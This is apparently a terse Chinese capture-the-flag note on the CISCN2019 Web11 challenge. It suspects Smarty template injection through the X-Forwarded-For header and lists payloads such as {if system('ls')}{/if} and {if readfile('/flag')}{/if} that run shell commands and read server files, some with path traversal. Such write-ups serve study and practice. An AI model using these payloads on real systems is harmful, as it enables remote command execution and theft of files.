[CISCN2019 华东南赛区]Web11 看到这个页面就想到抓包xff处注入 猜测有ssti smarty模板注入 {if phpinfo()}{/if} {if system('ls')}{/if} {if readfile('/flag')}{/if} {if show_source('/flag')}{/if} {if system('cat ../../../flag')}{/if} {if system('ls ../../../../..')}{/if} {if readfile('/flag')}{/if}